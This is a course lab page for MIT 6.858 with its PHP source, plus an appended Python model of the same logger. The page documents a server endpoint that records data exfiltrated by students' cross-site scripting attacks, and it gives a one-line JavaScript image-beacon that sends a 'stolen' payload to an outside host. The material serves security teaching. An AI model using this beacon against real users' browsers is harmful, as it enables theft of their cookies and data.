You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2020/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;   // no id given: skip logging and just render the page below
    }
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }
    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }
    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }
    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }
    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }
    // Neutralise line breaks so a single request cannot forge extra log lines.
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);
    $file = fopen("/tmp/6.858-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }
    // Keep at most the 100 most recent previous entries, then write the new one first.
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }
    flock($file, LOCK_UN);
    fclose($file);
    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src=" .
    "'https://css.csail.mit.edu/6.858/2020/labs/log.php?'" .
    " + 'id=my-username'" .
    " + '&payload=some-string' + '&random='" .
    " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="labs.css" />
<title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>
<p>
You can use this server side script to extract data from client-side JavaScript.
For example, clicking this client-side hyperlink will cause the server to log the payload:
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image.
We suggest that you use the random argument in your scripts as well.
The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username.
Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>
<h2>Test form</h2>
<p>
If you just want to try out the script, you can use this form.
(For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
</p>
<form method="GET" action="">
<label for="id">ID:</label><br />
<input name="id" placeholder="your-mit-username" size="40" />
<i>(some identifier to locate your payload in the log)</i>
<br />
<br />
<label for="payload">Payload:</label><br />
<input name="payload" placeholder="some-string" size="40" />
<i>(the information you stole)</i>
<br />
<input type="submit" value="Log" name="log_submit" />
</form>
<h2>Logged entries</h2>
<p>
Below are the most recent logged entries, so that you can check if your attack worked:
</p>
<pre class="tty"><?php $lines = file_get_contents("/tmp/6.858-logger.txt"); echo htmlspecialchars($lines); ?></pre>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>
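As an added example (not part of the lab page or the course's code), here is a Python model of the checks the PHP logger above performs and of the log-line format it writes: the 1000-byte caps, the 5-second duplicate window, CR/LF neutralisation, the 100-entry rewrite, and a parser for the resulting `date: id: payload` lines so you can test whether an entry landed. The `Logger` class, its injectable `clock`, and `parse_entry` are this example's own names; the APCu-missing 501 branch is left out.

```python
import email.utils
import time

MAX_LEN = 1000       # byte cap, as in the PHP strlen() checks
DEDUP_WINDOW = 5.0   # seconds, as in apcu_add($payload, true, 5)
MAX_OLD_LINES = 100  # the PHP re-writes at most 100 previous lines


class Logger:
    def __init__(self, clock=time.time):
        self.clock = clock
        self.recent = {}   # payload -> time first seen; stands in for the APCu cache
        self.lines = []    # newest entry first, matching the rewrite loop in the PHP

    def handle(self, params):
        """Return (status, message) mirroring the PHP header()/echo pairs."""
        if "id" not in params:
            return 200, ""   # no id: the PHP leaves do{}while(0) and renders the page
        id_ = params["id"]
        if len(id_.encode()) > MAX_LEN:
            return 413, "ID value is larger than 1000 bytes"
        payload = params.get("payload")
        if payload is None:
            return 400, "No payload given"
        if payload in ("", "0"):   # PHP empty() is also true for the string "0"
            return 400, "Empty payload given"
        if len(payload.encode()) > MAX_LEN:
            return 413, "Payload is larger than 1000 bytes"
        now = self.clock()
        seen = self.recent.get(payload)
        if seen is not None and now - seen < DEDUP_WINDOW:
            return 429, "That exact payload was sent very recently; rejecting"
        self.recent[payload] = now   # apcu_add only sets an absent or expired key
        # CR/LF become '.', so one request cannot forge extra log lines.
        payload = payload.replace("\n", ".").replace("\r", ".")
        id_ = id_.replace("\n", ".").replace("\r", ".")
        line = f"{email.utils.formatdate(now)}: {id_}: {payload}"
        self.lines = [line] + self.lines[:MAX_OLD_LINES]
        return 200, "Logged!"


def parse_entry(line):
    """Split a 'date: id: payload' line; the payload itself may contain ': '."""
    date, id_, payload = line.split(": ", 2)
    # The split is only unambiguous because the date never contains ': ' and CR/LF
    # are neutralised; an id containing ': ' would still shift the fields, so treat
    # the recovered id and payload as untrusted input.
    return email.utils.parsedate_to_datetime(date), id_, payload
```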